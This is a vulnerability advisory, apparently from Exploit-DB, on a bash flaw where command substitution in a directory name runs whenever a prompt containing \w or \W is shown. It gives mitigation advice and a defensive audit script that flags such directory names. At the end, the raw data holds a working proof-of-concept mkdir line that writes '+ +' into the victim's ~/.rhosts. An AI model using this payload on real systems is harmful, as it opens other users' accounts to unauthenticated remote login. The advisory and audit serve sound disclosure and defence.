Vendor: Bash
By: Unknown
CVSS: N/A
Severity: HIGH
Type: Command Injection
CWE: 78
Product Name: Bash
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: YES
Platforms Tested: Unknown

Vulnerability in bash allowing commands embedded in the path to the current working directory to run inadvertently

A vulnerability in bash allows commands embedded in the path to the current working directory to be run inadvertently. If an unsuspecting user enters a directory that a malicious user created with embedded commands, their prompt (PS1) contains '\w' or '\W', and the prompt is displayed, the commands will be executed. The vulnerability is in the parsing of the '\w' and '\W' escape codes. Because the prompt must be displayed, unattended shell scripts are not vulnerable.

Mitigation:

Patch or update bash to the latest version. Avoid running untrusted scripts or accessing directories created by untrusted users.
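
An added example (not part of the original advisory or of bash) supporting the mitigation above: a POSIX shell audit that lists directories whose names contain command-substitution syntax (a backtick or "$("), the kind of name a vulnerable '\w' or '\W' expansion would execute. The function names has_cmd_subst and find_suspicious_dirs are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit a tree for directory names that carry
# command-substitution syntax. Function names are hypothetical.

# has_cmd_subst NAME
# Succeeds (exit 0) if NAME contains a backtick or "$(".
has_cmd_subst() {
    case "$1" in
        *'`'*|*'$('*) return 0 ;;
        *)            return 1 ;;
    esac
}

# find_suspicious_dirs [ROOT]
# Prints one line per directory under ROOT (default ".") whose own name
# contains a backtick or "$(". Non-printable bytes, including newlines
# inside a name, are shown as "?" so the report is safe to view on a
# terminal and every hit stays on a single line.
find_suspicious_dirs() {
    find "${1:-.}" -xdev -type d \( -name '*`*' -o -name '*$(*' \) \
        -exec sh -c 'for d in "$@"; do
            printf "%s" "$d" | LC_ALL=C tr -c "[:print:]" "?"
            echo
        done' sh {} + 2>/dev/null
}

# Example use: audit world-writable locations where other users can
# create directories, e.g.
#   find_suspicious_dirs /tmp
#   has_cmd_subst "$PWD" && echo "current path contains command substitution"
```

The audit only reports names; it never expands or evaluates them, so it is safe to run on an unpatched system.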

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/119/info

A vulnerability in bash may allow inadvertently running commands embedded in the path to the current working directory.

If an unsuspecting user enters a directory created by some malicious user with embedded commands, and their prompt (PS1) contains '\w' or '\W', and the prompt is displayed, the commands will be executed. The vulnerability is in the parsing of the '\w' and '\W' escape codes.

As the prompt must be displayed, unattended shell scripts are not vulnerable.

mkdir "\`echo -e \"echo + +> ~\57.rhosts\" > x; source x; rm -f \x\` "